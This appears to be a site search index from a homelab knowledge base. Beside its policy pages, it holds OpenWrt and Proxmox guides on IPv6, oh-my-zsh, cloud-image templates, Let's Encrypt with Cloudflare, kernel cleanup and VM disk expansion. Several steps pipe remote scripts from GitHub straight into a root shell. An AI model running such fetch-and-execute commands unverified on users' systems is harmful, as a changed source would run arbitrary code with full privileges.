Synology DS218+ NAS. 2x SAMSUNG 870 QVO 4TB SSD. Noctua NF-A9 FLX Fan. SABRENT USB 5GbE Ethernet. 2x Crucial 4GB DDR3l-1600. Used for
Data backup. Data synchronization. Data storage. Docker containers.
", "tags": ["HomeLab", "Synology", "NAS"]}, {"location": "information/affiliateDisclosure/", "title": "Affiliate Disclosure", "text": "This website can include advertising, supported content, paid inserts, affiliate links or other types of monetization.
We believe in the authenticity of relationships, views and identities. Compensation received can have an effect on the advertisement material, topics or posts made in this blog. Such content, advertising space or post will be specifically marked as paid or supported content. We will only endorse the products or services that we believe, based on our expertise, are worthy of this endorsement.
Any claim, statistic, quotation or other representation of a product or service should be verified with the manufacturer or supplier. This site does not contain any content that may constitute a conflict of interest.
This website does not provide any representations, warranties or assurances as to the accuracy,
currency or completeness of the content contained on this website or on any website linked to or from this website.
", "tags": ["information", "affiliate"]}, {"location": "information/affiliateDisclosure/#participant-programs", "title": "Participant Programs\u200b", "text": "This website is a participant in the Amazon Services LLC Associates Program, aliexpress, an affiliate advertisement program designed to provide a way for websites to receive advertising fees through advertising and links to amazon.com, aliexpress.com.
", "tags": ["information", "affiliate"]}, {"location": "information/cookies-policy/", "title": "Cookies Policy", "text": "We use cookies and other similar technologies to help provide our Services, to advertise to you and to analyse how you use our Services and whether advertisements are being viewed. We also allow third parties to use tracking technologies for similar purposes. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. The Help menu on the menu bar of most browsers also tells you how to prevent your browser from accepting new cookies, how to delete old cookies, how to have the browser notify you when you receive a new cookie and how to disable cookies altogether.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#what-are-cookies", "title": "What are Cookies?", "text": "A cookie is a small text file which is sent to your computer or mobile device (referred to in this policy as a \u201cdevice\u201d) by the web server so that the website can remember some information about your browsing activity on the website. The cookie will collect information relating to your use of our sites, information about your device such as the device\u2019s IP address and browser type, demographic data and, if you arrived at our site via a link from third party site, the URL of the linking page. If you are a registered user or subscriber it may also collect your name and email address, which may be transferred to data processors for registered user or subscriber verification purposes. Cookies record information about your online preferences and help us to tailor our websites to your interests. Information provided by cookies can help us to analyse your use of our sites and help us to provide you with a better user experience. We use tracking technologies for the following purposes:
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#performance-purposes", "title": "Performance Purposes", "text": "These cookies are necessary for the website to function and cannot be switched off in our systems. These are used to let you login, to ensure site security and to provide shopping cart functionality. Without this type of technology, our Services won\u2019t work properly or won\u2019t be able to provide certain features and functionalities.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#personalization-cookies", "title": "Personalization Cookies", "text": "These cookies are used to analyze how visitors use a website, for instance which pages visitors visit most often, in order to provide a better user experience. We also use this technology to check if you have opened our emails, so we can see if they are being delivered correctly and are of interest.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#advertising-cookies", "title": "Advertising Cookies", "text": "These cookies are used to limit the number of times you see an advertisement, or to customize advertising across our Services and make it more relevant to you and to allow us to measure the effectiveness of advertising campaigns and track whether ads have been properly displayed so we can pay for this. You have the option to change your choices relating to cookies utilized to deliver behaviorally targeted advertising here for EU \u201cAdvertising cookies\u201d and here for US Advertising cookies.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#social-media-cookies", "title": "Social Media Cookies", "text": "Cookies are used by social media services to enable you to share our content with your friends and networks. These cookies may track your browser across other sites and build a profile of your interests, which may impact the content and messages you see on other websites that you visit.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#google-analytics", "title": "Google Analytics", "text": "We use Google Analytics for aggregated, anonymized website traffic analysis. In order to track your session usage, Google drops a cookie (_ga) with a randomly-generated ClientID in your browser. This ID is anonymized and contains no identifiable information like email, phone number, name, etc. We also send Google your IP Address. We use GA to track aggregated website behavior, such as what pages you looked at, for how long, and so on. This information is important to us for improving the user experience and determining site effectiveness. If you would like to access what browsing information we have \u2013 or ask us to delete any GA data \u2013 please delete your _ga cookies, reach out to us via this form, and/or install the Google Analytics Opt-Out Browser Add-On.
", "tags": ["information", "Cookies"]}, {"location": "information/cookies-policy/#how-to-manage-remove-cookies", "title": "How to manage & remove cookies", "text": "If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. The Help menu on the menu bar of most browsers also tells you how to prevent your browser from accepting new cookies, how to delete old cookies, how to have the browser notify you when you receive a new cookie and how to disable cookies altogether. You can also visit https://www.aboutcookies.org for more information on how to manage and remove cookies across a number of different internet browsers. You also have the option to change your choices relating to cookies utilized to deliver behaviorally targeted advertising here for EU \u201cAdvertising cookies\u201d and here for US Advertising cookies. If you would like to contact us about cookies please our online feedback form or our contact page.
", "tags": ["information", "Cookies"]}, {"location": "information/endorsement/", "title": "Website Endorsements", "text": "Website endorsement for our partners and friends who support our mission.
", "tags": ["information", "endorsements"]}, {"location": "information/endorsement/#adventureapp", "title": "adventure.app", "text": "Adventure is an app that provides you with a simple and intuitive interface to plan your trip. You can choose from a wide range of activities and destinations. We also provide you with a recommendation system that will help you choose the best activity for you. Visit adventure.app!
", "tags": ["information", "endorsements"]}, {"location": "information/license/", "title": "License", "text": "", "tags": ["information", "license"]}, {"location": "information/license/#mit-license", "title": "MIT License", "text": "Copyright\u00a9 3os.org 2022
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
", "tags": ["information", "license"]}, {"location": "information/portfolio/", "title": "Stas Yakobov's Portfolio", "text": "Stas Yakobov aka fire1ce \u2022 I'm a security researcher - specialized in hardware penetration tests
\u2022 I like experimenting with technologies, building small projects, automate everything.
\u2022 Passionate about security, linux, dockers, electronics(IoT), coding, open-source and knowledge
\u2022 I'm the owner and the maintainer of the 3os.org knowledge-base website
How To Reach Me
", "tags": ["portfolio", "resume"]}, {"location": "information/privacy-policy/", "title": "Privacy Policy", "text": "Your privacy is very important to us. Accordingly, we have developed this policy in order for you to understand how we collect, use, communicate and make use of personal information. The following outlines our privacy policy.
When accessing this website, we will learn certain information about you during your visit.
Similar to other commercial websites, our website utilizes a standard technology called \u2018cookies\u2019 (see explanation below) and server logs to collect information about how our site is used. Information gathered through cookies and server logs may include the date and time of visits, the pages viewed, time spent at our site, and the websites visited just before and just after our own, as well as your IP address.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#use-of-cookie", "title": "Use of Cookie", "text": "A cookie is a very small text document, which often includes an anonymous unique identifier. When you visit a website, that site\u2019s computer asks your computer for permission to store this file in a part of your hard drive specifically designated for cookies. Each website can send its own cookie to your browser if your browser\u2019s preferences allow it, but (to protect your privacy) your browser only permits a website to access the cookies it has already sent to you, not the cookies sent to you by other sites.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#ip-addresses", "title": "IP Addresses", "text": "IP addresses are used by your computer every time you are connected to the Internet. Your IP address is a number that is used by computers on the network to identify your computer. IP addresses are automatically collected by our web server as part of demographic and profile data known as \u201ctraffic data\u201d so that data (such as the Web pages you request) can be sent to you.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#email-information", "title": "Email Information", "text": "If you choose to correspond with us through email, we may retain the content of your email messages together with your email address and our responses. We provide the same protections for these electronic communications that we employ in the maintenance of information received online, mail and telephone. This also applies when you register for our website, sign up through any of our forms using your email address or make a purchase on this site. For further information see the email policies below.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#how-do-we-use-the-information-that-you-provide-to-us", "title": "How Do We Use The Information That You Provide To Us?", "text": "Broadly speaking, we use personal information for purposes of administering our business activities, providing customer service and making available other items and services to our customers and prospective customers.
We will not obtain personally-identifying information about you when you visit our site, unless you choose to provide such information to us, nor will such information be sold or otherwise transferred to unaffiliated third parties without the approval of the user at the time of collection.
We may disclose information when legally compelled to do so, in other words, when we, in good faith, believe that the law requires it or for the protection of our legal rights.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#email-policies", "title": "Email Policies", "text": "We are committed to keeping your e-mail address confidential. We do not sell, rent, or lease our subscription lists to third parties, and we will not provide your personal information to any third party individual, government agency, or company at any time unless strictly compelled to do so by law.
We will use your e-mail address solely to provide timely information about our website.
We will maintain the information you send via e-mail in accordance with applicable federal law.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#can-spam-compliance", "title": "CAN-SPAM Compliance", "text": "In compliance with the CAN-SPAM Act, all e-mail sent from our organization will clearly state who the e-mail is from and provide clear information on how to contact the sender. In addition, all e-mail messages will also contain concise information on how to remove yourself from our mailing list so that you receive no further e-mail communication from us.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#choiceopt-out", "title": "Choice/Opt-Out", "text": "Our site provides users the opportunity to opt-out of receiving communications from us and our partners by reading the unsubscribe instructions located at the bottom of any e-mail they receive from us at anytime.
Users who no longer wish to receive our newsletter or promotional materials may opt-out of receiving these communications by clicking on the unsubscribe link in the e-mail.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#use-of-external-links", "title": "Use of External Links", "text": "This website may contain links to many other websites. We cannot guarantee the accuracy of information found at any linked site. Links to or from external sites not owned or controlled by us do not constitute an endorsement by us or any of our employees of the sponsors of these sites or the products or information presented therein.
By accessing this web site, you are agreeing to be bound by these web site Terms and Conditions of Use, all applicable laws and regulations, and agree that you are responsible for compliance with any applicable local laws. If you do not agree with any of these terms, you are prohibited from using or accessing this site. The materials contained in this web site are protected by applicable copyright and trade mark law.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#acceptable-use", "title": "Acceptable Use", "text": "You agree to use our website only for lawful purposes, and in a way that does not infringe the rights of, restrict or inhibit anyone else\u2019s use and enjoyment of the website. Prohibited behavior includes harassing or causing distress or inconvenience to any other user, transmitting obscene or offensive content or disrupting the normal flow of dialogue within our website.
You must not use our website to send unsolicited commercial communications. You must not use the content on our website for any marketing related purpose without our express written consent.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#restricted-access", "title": "Restricted Access", "text": "We may in the future need to restrict access to parts (or all) of our website and reserve full rights to do so. If, at any point, we provide you with a username and password for you to access restricted areas of our website, you must ensure that both your username and password are kept confidential.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#use-of-testimonials", "title": "Use of Testimonials", "text": "In accordance with the FTC guidelines concerning the use of endorsements and testimonials in advertising, please be aware of the following:
Testimonials that appear on this site are actually received via text, audio or video submission. They are individual experiences, reflecting real life experiences of those who have used our products and/or services in some way. They are individual results and results do vary. We do not claim that they are typical results. The testimonials are not necessarily representative of all of those who will use our products and/or services.
The testimonials displayed in any form on this site (text, audio, video or other) are reproduced verbatim, except for correction of grammatical or typing errors. Some may have been shortened. In other words, not the whole message received by the testimonial writer is displayed when it seems too lengthy or not the whole statement seems relevant for the general public.
We are not responsible for any of the opinions or comments posted on this website. This website is not a forum for testimonials, however it provides testimonials as a means for customers to share their experiences with one another. To protect against abuse, all testimonials appear after they have been reviewed by the management. We do not share the opinions, views or commentary of any testimonials on this website \u2013 the opinions are strictly the views of the testimonial source.
The testimonials are never intended to make claims that our products and/or services can be used to diagnose, treat, cure, mitigate or prevent any disease. Any such claims, implicit or explicit, in any shape or form, have not been clinically tested or evaluated.
How Do We Protect Your Information And Secure Information Transmissions?
Email is not recognized as a secure medium of communication. For this reason, we request that you do not send private information to us by email. However, doing so is allowed, but at your own risk. Some of the information you may enter on our website may be transmitted securely via a secure medium known as Secure Sockets Layer, or SSL. Credit Card information and other sensitive information is never transmitted via email.
We may use software programs to create summary statistics, which are used for such purposes as assessing the number of visitors to the different sections of our site, what information is of most and least interest, determining technical design specifications, and identifying system performance or problem areas.
For site security purposes and to ensure that this service remains available to all users, we use software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise cause damage.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#disclaimer-and-limitation-of-liability", "title": "Disclaimer And Limitation Of Liability", "text": "We make no representations, warranties, or assurances as to the accuracy, currency or completeness of the content contained on this website or any sites linked to this site.
All the materials on this site are provided \u2018as is\u2019 without any express or implied warranty of any kind, including warranties of merchantability, noninfringement of intellectual property or fitness for any particular purpose. In no event shall or its agents or associates be liable for any damages whatsoever (including, without limitation, damages for loss of profits, business interruption, loss of information, injury or death) arising out of the use of or inability to use the materials, even if has been advised of the possibility of such loss or damages.
", "tags": ["information", "privacy policy"]}, {"location": "information/privacy-policy/#policy-changes", "title": "Policy Changes", "text": "We reserve the right to amend this privacy policy at any time with or without notice. However, please be assured that if the privacy policy changes in the future, we will not use the personal information you have submitted to us under this privacy policy in a manner that is materially inconsistent with this privacy policy, without your prior consent.
We are committed to conducting our business in accordance with these principles in order to ensure that the confidentiality of personal information is protected and maintained.
", "tags": ["information", "privacy policy"]}, {"location": "infrastructure/openwrt/disable-ipv6/", "title": "OpenWrt Disable IPV6", "text": "The following steps will disable IPV6 on your OpenWrt router . All the steps are performed via the command line. You can perform them in the console of the router but the preferred way is via SSH.
Follow the following steps to disable IPV6 on your OpenWrt router:
uci set 'network.lan.ipv6=0'\nuci set 'network.wan.ipv6=0'\nuci set 'dhcp.lan.dhcpv6=disabled'\n/etc/init.d/odhcpd disable\nuci commit\n
Disable RA and DHCPv6 so no IPv6 IPs are handed out:
uci -q delete dhcp.lan.dhcpv6\nuci -q delete dhcp.lan.ra\nuci commit dhcp\n/etc/init.d/odhcpd restart\n
You can now disable the LAN delegation:
uci set network.lan.delegate=\"0\"\nuci commit network\n/etc/init.d/network restart\n
You might as well disable odhcpd:
/etc/init.d/odhcpd disable\n/etc/init.d/odhcpd stop\n
And finally you can delete the IPv6 ULA Prefix:
uci -q delete network.globals.ula_prefix\nuci commit network\n/etc/init.d/network restart\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/", "title": "Install oh-my-zsh on OpenWrt", "text": "You can install oh-my-zsh on OpenWrt, make sure to use the Prevent User Lockout
option since many users have been locked out of their sessions because the zsh
shell was not installed or loaded properly.
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/#whats-zsh", "title": "What's ZSH", "text": "Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/#whats-oh-my-zsh", "title": "What's Oh-My-Zsh", "text": "Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/#installation-of-oh-my-zsh", "title": "Installation of oh-my-zsh", "text": "Install Requirements Packages
opkg update && opkg install ca-certificates zsh curl git-http\n
Install oh-my-zsh
sh -c \"$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)\"\n
Set zsh as default (thanks to @mlouielu)
which zsh && sed -i -- 's:/bin/ash:'`which zsh`':g' /etc/passwd\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/install-oh-my-zsh/#prevent-user-lockout", "title": "Prevent User Lockout", "text": "To prevent lock-outs after accidentally removing zsh (thanks to @fox34) (as explained in the wiki) you can add a check for zsh
and fallback to ash
in /etc/rc.local
:
# Revert root shell to ash if zsh is not available\nif grep -q '^root:.*:/usr/bin/zsh$' /etc/passwd && [ ! -x /usr/bin/zsh ]; then\n# zsh is root shell, but zsh was not found or not executable: revert to default ash\n[ -x /usr/bin/logger ] && /usr/bin/logger -s \"Reverting root shell to ash, as zsh was not found on the system\"\nsed -i -- 's:/usr/bin/zsh:/bin/ash:g' /etc/passwd\nfi\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/snippets/", "title": "Snippets and Tips", "text": "OpenWrt Snippets with useful commands and scripts. Best practices and tips.
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/snippets/#update-all-packages-on-openwrt-from-ssh", "title": "Update all packages on OpenWrt from SSH", "text": "opkg update && opkg list-upgradable | cut -f 1 -d ' ' | xargs opkg upgrade\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/openwrt/snippets/#enable-luci-https-redirect-from-http", "title": "Enable LuCI HTTPS redirect from HTTP", "text": "This will activate the HTTPS redirect from HTTP in LuCI.
uci set uhttpd.main.redirect_https=1\nuci commit uhttpd\nservice uhttpd reload\n
", "tags": ["template", "markdown"]}, {"location": "infrastructure/proxmox/cloud-image-template/", "title": "Proxmox Cloud Image Template", "text": "", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#about-cloud-images", "title": "About Cloud Images", "text": "Cloud images are operating system templates and every instance starts out as an identical clone of every other instance. It is the user data that gives every cloud instance its personality and cloud-init is the tool that applies user data to your instances automatically.
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#advantage-of-cloud-image-template", "title": "Advantage of Cloud Image Template", "text": " Predefined SSH keys Predefined user account Predefined network configuration VM creation time is under a few minutes No installation process required like with ISO images First boot always updated with latest updates ", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#ubuntu-cloud-images", "title": "Ubuntu Cloud Images", "text": "Ubuntu provides official cloud images. You can find the proper image for your needs at cloud-images.ubuntu.com.
In this tutorial we will be using Ubuntu Server 22.04 LTS Jammy Jellyfish
cloud image.
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#create-cloud-image-template", "title": "Create Cloud Image Template", "text": "SSH to your Proxmox server.
Download the cloud image template from the official website.
wget https://cloud-images.ubuntu.com/jammy/current/jammy-server-cloudimg-amd64.img\n
In order to create a cloud image template first of all we need to create a new VM
. After we will configure it we will create a Template
from it.
The following parameters will predefine our Base Template
Command parameters description:
9000: VM ID in Proxmox. I prefer to use high number for management purposes. memory: VM's memory in MB. core: Number of CPU cores for the VM. name: Name of the VM and the template. net0: Network interface for the VM. bridge: Network bridge for the VM. agent: Enable or disable QEMU agent support. onboot: Enable or disable VM start on boot. Create a new virtual machine.
qm create 9000 --memory 2048 --core 2 --name ubuntu-22.04-cloud --net0 virtio,bridge=vmbr0 --agent enabled=1 --onboot 1\n
The default storage Proxmox creates for vm is storage1. In my case I use different storage for vm's and templates named storage1. The following commands will utilize the storage1 storage. Change the storage name for your Proxmox server.
Import the downloaded Ubuntu Cloud Image
we downloaded before disk to the storage.
qm importdisk 9000 jammy-server-cloudimg-amd64.img storage1\n
Attach the new disk to the vm as a scsi
drive on the scsi
controller
qm set 9000 --scsihw virtio-scsi-pci --scsi0 storage1:vm-9000-disk-0\n
Add cloud init drive
qm set 9000 --ide2 storage1:cloudinit\n
Make the cloud init drive bootable and restrict BIOS to boot from disk only
qm set 9000 --boot c --bootdisk scsi0\n
Add serial console
qm set 9000 --serial0 socket --vga serial0\n
WARNING: DO NOT START THE VM
Powering on the vm will create a unique ID that will persist with the template. We want to avoid this.
Now head to the Proxmox web interface. Select the new vm and Cloud-Init
tab.
Configure the default setting for the cloud image template. This will allow the VM to start with predefined user, password, ssh keys and network configuration.
At this point we configured the VM and we can create a cloud image template from it.
Create a new cloud image template.
qm template 9000\n
Now you can use the Cloud Image Template to create new vm instances. You can do it from the Proxmox web interface or from the command line.
Tip
Use Full Clone when creating a new VM from a cloud image template. Linked Clone will prevent you from deleting the cloud image template.
Cli example:
qm clone 9000 122 --name my-new-vm --full\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#vms-storage", "title": "VM's Storage", "text": "Since we are using a minimal cloud image template. Cloned VM's will use the same storage as the template which is about 2GB of disk space.
You can utilize an automated script to expand the disk space of the cloned VM: VM Disk Expander
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#troubleshooting", "title": "Troubleshooting", "text": "", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/cloud-image-template/#reseting-vms-machine-id", "title": "Resetting VM's machine-id
", "text": "Run the following command inside the VM to reset the machine-id.
sudo rm -f /etc/machine-id\nsudo rm -f /var/lib/dbus/machine-id\n
Shutdown the VM. Then power it back on. The machine-id will be regenerated.
If the machine-id is not regenerated you can try to fix it by running the following command.
sudo systemd-machine-id-setup\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/lets-encrypt-cloudflare/", "title": "Proxmox Valid SSL With Let's Encrypt and Cloudflare DNS", "text": "This is a guide to how to setup a valid SSL certificate with Let's Encrypt and Cloudflare DNS
for Proxmox VE
. Let's Encrypt will allow you to obtain a valid SSL certificate for your Proxmox VE Server for free for 90 days. In the following steps, we will setup a valid SSL certificate for your Proxmox VE Server using Let's Encrypt and Cloudflare DNS Challenge. The process of renewing the certificate is done automatically by Proxmox VE Server and you do not need to do anything manually to renew the certificate.
", "tags": ["proxmox", "cloudflare", "letsencrypt"]}, {"location": "infrastructure/proxmox/lets-encrypt-cloudflare/#prerequarements", "title": "Prerequisites", "text": " Existing DNS record for the domain name you want to use for Proxmox VE. Cloudflare DNS Zone API Access Token. Cloudflare DNS Zone ID. I won't be covering the process of creating the Zone API Tokens in this guide. You can find more information about this process here.
", "tags": ["proxmox", "cloudflare", "letsencrypt"]}, {"location": "infrastructure/proxmox/lets-encrypt-cloudflare/#instalaion-and-configuration", "title": "Installation and Configuration", "text": "The process will be done fully in Proxmox web interface. Log in to the Proxmox web interface, select Datacenter
, find ACME
and click on it.
At Account
section, click Add. Fill the Account Name
and E-Mail
. Accept the Terms and Conditions (TOC). Click Register
. This will register an account for Let's Encrypt service in order to obtain a certificate.
The output should be something like this:
At Challenge Plugin
section, click Add. Fill the Plugin ID
(name), at DNS API
choose Cloudflare Managed DNS
. CF_Token=
and CF_Zone_ID=
are the API Tokens and Zone ID for Cloudflare DNS - leave the rest empty.
The final screen should look like this:
Select the Pve Server
in my case its name proxmox
, under System
select Certificates
.
At ACME
section, click Edit
and select the Account
we created earlier.
Click Add
, select Challenge Type
DNS
and Challenge Plugin
the plugin we created earlier. Domain
is the domain name we want to use for the certificate. Click Create
.
Now its time to issue the certificate. Click Order Certificate Now
.
At this point Proxmox will try to issue the certificate from Let's Encrypt and validate it with Cloudflare DNS Challenge.
If all goes well, you will see the following:
Now the certificate is installed and ready to use. The renewal process is done automatically by Proxmox VE Server.
", "tags": ["proxmox", "cloudflare", "letsencrypt"]}, {"location": "infrastructure/proxmox/pvekclean/", "title": "PVE Kernel Cleaner", "text": "Easily remove old/unused PVE kernels on your Proxmox VE system
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#developers", "title": "Developers", "text": " Jordan Hillis - Lead Developer The original pvekclean github page
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#what-is-pve-kernel-cleaner", "title": "What is PVE Kernel Cleaner?", "text": "PVE Kernel Cleaner is a program to compliment Proxmox Virtual Environment which is an open-source server virtualization environment. PVE Kernel Cleaner allows you to purge old/unused kernels filling the /boot directory. As new kernels are released the older ones have to be manually removed frequently to make room for newer ones. This can become quite tedious and require extensive time spent monitoring the system when new kernels are released and when older ones need to be cleared out to make room. With this issue existing, PVE Kernel Cleaner was created to solve it.
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#features", "title": "Features", "text": " Removes old PVE kernels from your system Ability to schedule PVE kernels to automatically be removed on a daily/weekly/monthly basis Run a simple pvekclean command for ease of access Checks health of boot disk based on space available Debug mode for non-destructive testing Update function to easily update the program to the latest version Allows you to specify the minimum number of most recent PVE kernels to retain Support for the latest Proxmox versions and PVE kernels ", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#prerequisites", "title": "Prerequisites", "text": "Before using this program you will need to have the following packages installed. * cron * curl * git
To install all required packages enter the following command.
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#debian", "title": "Debian:", "text": "sudo apt-get install cron curl git\n
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#installing", "title": "Installing", "text": "You can install PVE Kernel Cleaner using either Git or Curl. Choose the method that suits you best:
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#installation-via-git", "title": "Installation via Git", "text": " Open your terminal.
Enter the following commands one by one to install PVE Kernel Cleaner:
git clone https://github.com/jordanhillis/pvekclean.git\ncd pvekclean\nchmod +x pvekclean.sh\n./pvekclean.sh\n
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#installation-via-curl", "title": "Installation via Curl", "text": " Open your terminal.
Use the following command to install PVE Kernel Cleaner:
curl -o pvekclean.sh https://raw.githubusercontent.com/jordanhillis/pvekclean/master/pvekclean.sh\nchmod +x pvekclean.sh\n./pvekclean.sh\n
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#updating", "title": "Updating", "text": "PVE Kernel Cleaner checks for updates automatically when you run it. If an update is available, you'll be notified within the program. Simply follow the on-screen instructions to install the update, and you're all set with the latest version!
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/pvekclean/#usage", "title": "Usage", "text": "Example of usage:
pvekclean [OPTION1] [OPTION2]...\n\n-k, --keep [number] Keep the specified number of most recent PVE kernels on the system\n Can be used with -f or --force for non-interactive removal\n-f, --force Force the removal of old PVE kernels without confirm prompts\n-rn, --remove-newer Remove kernels that are newer than the currently running kernel\n-s, --scheduler Have old PVE kernels removed on a scheduled basis\n-v, --version Shows current version of pvekclean\n-r, --remove Uninstall pvekclean from the system\n-i, --install Install pvekclean to the system\n-d, --dry-run Run the program in dry run mode for testing without making system changes\n
", "tags": ["proxmox"]}, {"location": "infrastructure/proxmox/vm-disk-expander/", "title": "Proxmox Virtual Machine Disk Expander", "text": "Github Repository: Proxmox vm disk expander
Interactive disk expander for Proxmox's VM disks (including the partition) from your Proxmox host cli.
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#curl-method", "title": "Curl Method", "text": "Run the script once, without installing it.
bash <(curl -s https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/expand.sh)\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#installer", "title": "Installer", "text": "Install the script at Proxmox host for multiple use.
Run the following command from Proxmox host:
curl -sS https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/install.sh | bash\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#usage", "title": "Usage", "text": "expand-disk\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#update", "title": "Update", "text": "Same as the installer.
curl -sS https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/install.sh | bash\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#example-usageoutput", "title": "Example usage/output", "text": "\u256d\u2500root@proxmox ~\n\u2570\u2500# bash <(curl -s https://raw.githubusercontent.com/bermanboris/proxmox-vm-disk-expander/main/expand.sh) 1 \u21b5\n VMID NAME STATUS MEM(MB) BOOTDISK(GB) PID\n 100 vm100 running 4096 40.20 1113\n101 test stopped 2048 2.20 0\n9000 ubuntu22-04-cloud stopped 2048 2.20 0\nEnter the VM ID to be expanded: 101\nEnter the size to be expanded in GB (example: 10G): 5G\nVM ID 101 disk storage1 will be expanded by 5G\nWarning: There is currently no way to downsize the disk!\nAre you sure you want to expand the disk? (yes/no): yes\n\nExpanding the disk... Size of logical volume storage1/vm-101-disk-0 changed from <2.20 GiB (563 extents) to <7.20 GiB (1843 extents).\n Logical volume storage1/vm-101-disk-0 successfully resized.\nGPT:Primary header thinks Alt. header is not at the end of the disk.\nGPT:Alternate GPT header not at the end of the disk.\nGPT: Use GNU Parted to correct GPT errors.\nadd map storage1-vm--101--disk--0p1 (253:12): 0 4384735 linear 253:11 227328\nadd map storage1-vm--101--disk--0p14 (253:13): 0 8192 linear 253:11 2048\nadd map storage1-vm--101--disk--0p15 (253:14): 0 217088 linear 253:11 10240\nWarning: The kernel is still using the old partition table.\nThe new table will be used at the next reboot or after you\nrun partprobe(8) or kpartx(8)\nThe operation has completed successfully.\n
", "tags": ["proxmox", "virtualization"]}, {"location": "infrastructure/proxmox/vm-disk-expander/#limitations", "title": "Limitations", "text": " VM must be stopped to expand the disk. Currently supported only \"cloud images\" (or single ext4 partition installation) but if you still want to resize regular vm with LVM partition table, you need to extend the LVM partition INSIDE the vm AFTER running the script. Resizing LVM is done like this: $ lvm\n\nlvm> lvextend -l +100%FREE /dev/ubuntu-vg/ubuntu-lv\nlvm> exit\n\n$ resize2fs /dev/ubuntu-vg/ubuntu-lv\n
